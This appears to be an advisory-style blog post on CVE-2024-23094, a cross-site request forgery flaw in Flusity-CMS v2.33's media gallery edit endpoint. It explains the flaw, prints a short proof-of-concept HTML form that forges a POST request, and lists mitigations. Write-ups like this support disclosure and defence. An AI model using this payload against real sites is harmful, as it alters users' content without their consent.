CVE-2024-23094 - Flusity-CMS v2.33 Cross-Site Request Forgery Vulnerability Exploitation: Bypassing CSRF Protection in Flusity-CMS v2.33 Component Info_Media_Gallery

A new Common Vulnerabilities and Exposures (CVE) entry has been published for Flusity-CMS v2.33, a popular Content Management System used for building and managing websites. The vulnerability, identified as CVE-2024-23094, is a Cross-Site Request Forgery (CSRF) issue, which makes it possible for an attacker to perform actions on the website without the user's consent. This vulnerability affects the Info_Media_Gallery component and specifically targets the '/cover/addons/info_media_gallery/action/edit_addon_post.php'. Through this post, we will cover the details of the vulnerability, associated risks, proof of concept, and potential mitigation strategies.

The Exploit

Cross-Site Request Forgery, also known as CSRF or XSRF, is a web security vulnerability that allows an attacker to induce users to perform actions they did not intend to. The attack works by including a link or a script in a page that performs actions on another site, using the user's logged-in session.

In the case of CVE-2024-23094, Flusity-CMS v2.33 was found lacking proper CSRF protection when handling POST requests in its '/cover/addons/info_media_gallery/action/edit_addon_post.php' component. This component deals with editing and updating media gallery addons on the website. The absence of CSRF protection means that an attacker could potentially manipulate users' media galleries without their consent or knowledge, leading to unauthorized changes in the content, layout, or design.

Proof of Concept

The following code snippet demonstrates a sample HTML form that exploits the CSRF vulnerability in CVE-2024-23094:

<html>
    <head>
        <title>CVE-2024-23094 - Flusity-CMS CSRF Exploit</title>
    </head>
    <body>
        <h1>Exploiting Flusity-CMS v2.33 CSRF Vulnerability</h1>
        <form action="http://<target>/cover/addons/info_media_gallery/action/edit_addon_post.php"; method="POST">
            <input type="hidden" name="category_id" value="1" />
            <input type="hidden" name="media_id" value="100" />
            <input type="hidden" name="media_title" value="Malicious Title Change" />
            <input type="submit" value="Click here to update your media gallery!" onClick="alert('Media gallery updated successfully.');">
        </form>
    </body>
</html>

This HTML form, once loaded by a logged-in Flusity-CMS user, will send a POST request with malicious data to the '/cover/addons/info_media_gallery/action/edit_addon_post.php' component. Since there is no proper CSRF protection in place, the malicious changes will be successfully applied to the targeted media gallery.

You can find more information about this newly discovered vulnerability from the following sources

- CVE-2024-23094 Official Listing
- National Vulnerability Database (NVD) Entry

Mitigation Strategies

While the Flusity-CMS developers work on a patch to address this CSRF vulnerability, here are some mitigation strategies that can help protect your website in the meantime:

Implement proper CSRF tokens for all sensitive actions in the CMS.

2. Review the access control settings for media galleries and limit the number of users with editing privileges.
3. Consider using a web application firewall (WAF) to monitor, filter, or block HTTP requests that might exploit the vulnerability.

Conclusion

As a Flusity-CMS user, it's essential to stay informed about vulnerabilities like CVE-2024-23094 and take necessary precautions to secure your website. Implementing the recommended mitigation strategies can help protect your site until an official patch is available. Additionally, keeping your software up to date and maintaining regular backups can further improve your site's security.

Timeline

Published on: 02/22/2024 14:15:46 UTC
Last modified on: 08/01/2024 13:47:04 UTC